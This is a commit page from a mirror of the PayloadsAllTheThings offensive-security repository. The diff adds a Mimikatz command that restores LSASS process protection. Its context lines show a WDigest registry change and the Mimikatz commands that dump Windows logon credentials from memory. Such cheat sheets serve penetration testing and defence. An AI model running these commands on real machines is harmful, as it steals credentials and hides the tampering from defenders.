1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-24 18:26:24 +02:00

add mimikatz command to protect a process again after removing the protection

fe4e984055/mimikatz/modules/kuhl_m_kernel.c (L99)
This commit is contained in:
mpgn 2021-02-17 12:15:47 +01:00 committed by GitHub
parent f6f8ec010a
commit 9be371d793
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -77,6 +77,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
# Now lets re-add the protection flags to the lsass.exe process
mimikatz # !processprotect /process:lsass.exe
```
- LSA is running as virtualized process (LSAISO) by **Credential Guard**